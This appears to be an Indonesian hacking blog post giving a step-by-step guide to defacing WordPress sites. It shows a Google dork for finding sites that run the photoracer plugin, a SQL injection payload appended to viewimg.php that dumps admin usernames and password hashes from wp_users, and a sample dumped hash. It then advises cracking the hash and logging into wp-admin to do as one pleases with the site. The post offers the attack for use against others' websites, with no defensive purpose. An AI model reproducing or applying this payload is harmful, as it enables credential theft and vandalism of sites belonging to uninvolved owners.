Tutorial Deface Dengan Exploit Wordpress

     Selamat siang semuanya ....
udah lama nih ga post masalah Deface soalnya saya blm sempet post masih Fokus UN
tapi pada sekarang saya sempatkan untuk Share Tutorial Deface Dengan Exploit Wordpress
oke dari pada mengulurwaktu mending langsung ke Step nya

Tutorial

• Ketik dork berikut ke kotak pencarian google :

inurl:"wp-content/plugins/photoracer/viewimg.php?id="

• Nanti akan muncul beberapa Target web silahkan pilih salah satu
• Jika sudah menemukan Target masukan Exploit ini di belakang url target

+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users

Contoh : 
Sebelum : www.site.com/wp-content/plugins/photoracer/viewimg.php?id=1
menjadi : www.site.com/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users

• Nah jika berhasil akan ada penampakan Username dan Pasword Admin web tersebut 

Contoh : admin:$P$BfwsoL2ygVgJxpx3lLT9j/0IxRRgDB1

•  Password tersebut masih dalam bentuk salt/MD5  silahkan anda Crack   

Untuk Password dalam bentuk MD5 silahkan Crac disini  : Crack

• Jika sudah dapat Username dan passwordnya silahkan Login ke web target melalui

www.site.com/wp-admin/

• Setelah login terserah kalian mau di apakan web itu

Sekian Tutorial ini saya buat semoga bermanfaat

Author : Unknown

Share this

Related Posts